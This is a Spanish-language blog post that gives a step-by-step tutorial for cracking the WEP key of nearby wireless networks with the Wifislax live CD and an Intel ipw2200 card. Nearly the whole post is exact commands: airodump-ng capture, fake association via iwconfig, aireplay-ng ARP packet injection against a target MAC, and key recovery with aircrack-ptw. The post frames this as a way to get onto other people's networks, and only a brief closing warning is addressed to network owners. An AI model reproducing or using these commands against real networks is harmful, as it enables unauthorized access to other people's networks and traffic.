Geek City

Holas!

El otro día, viendo que en mi Laptop me llegaban muchas redes aparte de la mía, me puse a pensar si alguien se podría “colgar” en alguna de esas redes. Busqué por varios sitios de Internet, Blogs, etc. Hasta que por fin encontre este tutorial. Esto solo es posible por medio de Linux, y con alguna tarjeta inalámbrica que soporte la inyección de paquetes, en este caso pondré el tutorial enfocado en la tarjeta de red que tiene mi Lap. Trataré de ser lo más explicito posible para que lo entiendan los que no usan Linux (Como yo ).

Requisitos:

• Tarjeta de red inalámbrica Ipw2200 (Intel® PRO/Wireless 2200BG)
• Live CD Wifislax 3.0 (Descargar)
• Redes Inalámbricas disponibles.

Proceso:

1. Insertar el Live CD y reiniciar la computadora.
2. Una ves que entre al Wifislax, pedirá una usuario (root) y una contraseña (toor).
3. Una vez dentro se necesitarán 3 shells (El proceso se va a hacer en el orden que está escrito)
4. Se abre el shell 1
5. Teclear: rmmod ipw2200
6. Teclear: modprobe ipw2200 rtap_iface=1(Ambos pasos son para activar los drivers de la ipw2200 en el wifislax 3.0)
7. Teclear: iwconfig (Para comprobar que las interfaces estan activas) (Si no lo están repite pasos 1 y 2)
   
8. Teclear: airodump-ng rtap0 (Para ver cuales redes hay disponibles).
   
9. Oprimir: Control+C (Para detener el proceso)
10. Teclear: airodump-ng –c # -w wep rtap0 (el símbolo # debe ser sustituido por el número del canal de la red (que viene definido como CH) con mas poder que viene definido por la columna RXQ, entre mas alto mejor, en ocaciones esta columna no sale, también se puede ver la columna PWR para saber cuál red tomar) Ejemplo: airodump-ng –c 1 -w wep rtap0 (wep es el nombre del archivo en el que capturaremos los paquetes).
11. Se abre el shell 2
12. Teclear: iwconfig eth1 essid “NOMBRE DE LA RED EXACTAMENTE COMO ESTA ESCRITO” key 11111111111 Ejemplo: iwconfig eth1 essid “INFINITUM5362″ key 11111111111 (Esto es para asociarnos a ella con una clave cualquiera)
13. Teclear: iwconfig (para comprobar que estamos asociados, veremos el nombre de la red a la que estamos asociados en la interfaz eth1) Ejemplo: eth1 IEEE 802.11g ESSID:”INFINITUM5362″
14. Teclear: aireplay-ng -3 –x 1024 –g 1000000 –b MAC OBJETIVO –h MAC DE DONDE ESTAMOS REALIZANDO EL PROCESO –i rtap0 eth1 Ejemplo: aireplay-ng -3 –x 1024 –g 1000000 –b 00:18:3D:87:3S:35 –h 00:73:7F:K2:87:53 –i rtap0 eth1 (Esto es para comenzar a inyectar paquetes al access point que es la mac objetivo) NOTA: Si no sabes cuál es la mac de donde se esta realizando el proceso simplemente pon cualquier mac y al empezar el proceso ta saldrá el shell que la mac “TU MAC” no se puede asociar, o algo así no lo recuerdo bien, el caso es que ahí te sale entre paréntesis, luego das control + C para parar el proceso, y vuelves a teclear la instrucción anterior.
15. Esperar a juntar por lo menos 20,000 paquetes en DATA
16. Se abre el shell 3
17. Teclear: aircrack-ptw wep-01.cap (vean que wep es el nombre del archivo que le indicamos al airodump para que guardara los paquetes, y se le agrega un guion y un numero que indica el numero de captura con el mismo nombre)
18. Listo!! La clave son los digitos 10 dígitos hexadecimales que aparecen (vienen separados de dos en dos por un espacio, cuando se vaya a introducir la clave, se deben omitir esos espacios). Si fuera una clave de 128 bits serían 26 digitos hexadecimales.

Pues ahí esta, como se puede ver, si se puede que alguien se cuelge de nuestra red y que “compartamos” nuesto internet con esa persona, así que, mucho cuidado, si notan que la red se pone lenta, metanse al router inalámbrico del infinitum y cambién la red, al menos así les costará más trabajo tener que estar decifrando la red cada vez que se quieran conectar .

Cualquier duda, haganla saber.

Fuentes de donde fué tomada la información:

• TUTORIAL: Crackear wep con Intel Pro/Wireless 2200 (ipw2200)
• WEP Cracking con IPW2200